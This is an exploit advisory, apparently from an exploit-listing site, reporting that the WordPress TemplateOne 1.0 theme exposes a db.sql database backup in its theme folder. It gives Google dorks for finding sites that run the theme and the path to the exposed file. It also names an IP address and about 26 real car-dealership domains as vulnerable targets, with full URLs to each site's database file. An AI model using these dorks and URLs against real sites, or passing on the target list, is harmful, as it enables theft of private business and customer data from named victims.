WordPress TemplateOne 1.0 Database Disclosure

WordPress TemplateOne theme version 1.0 suffers from a database disclosure vulnerability.


MD5 | 2f35815aded9d139c322580225207518

#################################################################################################

# Exploit Title : WordPress TemplateOne Themes 1.0 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 02/12/2018
# Vendor Homepage : wordpress.org ~ dubicars.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Google Dorks :
inurl:''/wp-content/themes/templateone/''
intext:''A(c) Copyright 2015 | Powered by Dubicars''
intext:''A(c) Copyright 2017 | Powered by Dubicars''
intext:''A(c) Copyright 2018 | Powered by Dubicars''
intext:''Powered by Dubicars''
# Exploit Risk : Medium
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110153
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2247
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31482
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/themes/templateone/db.sql

#################################################################################################

# Example Vulnerable Sites =>

Vulnerable IP Address => (108.179.230.34)

There are 236 domains hosted on this server.

[+] simurghcars.ae/wp-content/themes/templateone/db.sql

[+] romeocars.ae/wp-content/themes/templateone/db.sql

[+] katrjimotors.com/wp-content/themes/templateone/db.sql

[+] algharymotors.ae/wp-content/themes/templateone/db.sql

[+] alaramcars.com/wp-content/themes/templateone/db.sql

[+] alsalamamotors.com/wp-content/themes/templateone/db.sql

[+] diamondclassmotors.com/wp-content/themes/templateone/db.sql

[+] tantoauto.com/wp-content/themes/templateone/db.sql

[+] storyauto-middleeast.com/wp-content/themes/templateone/db.sql

[+] tantoauto.com/wp-content/themes/templateone/db.sql

[+] whitemotors.org/wp-content/themes/templateone/db.sql

[+] 555motors.ae/wp-content/themes/templateone/db.sql

[+] tahanmotors.com/wp-content/themes/templateone/db.sql

[+] binhumaidan.com/wp-content/themes/templateone/db.sql

[+] formulaautofze.com/wp-content/themes/templateone/db.sql

[+] alnayrabusedcarstrading.com/wp-content/themes/templateone/db.sql

[+] exoticusedcarstr.com/wp-content/themes/templateone/db.sql

[+] dairausedcars.com/wp-content/themes/templateone/db.sql

[+] usmotorsuae.com/wp-content/themes/templateone/db.sql

[+] saleemmotors.com/wp-content/themes/templateone/db.sql

[+] moradmotors.com/wp-content/themes/templateone/db.sql

[+] najemmotors.com/wp-content/themes/templateone/db.sql

[+] jwmotors.net/wp-content/themes/templateone/db.sql

[+] ibitisammotors.com/wp-content/themes/templateone/db.sql

[+] classmotorsuae.com/wp-content/themes/templateone/db.sql

[+] alshibamotors.com/wp-content/themes/templateone/db.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Related Posts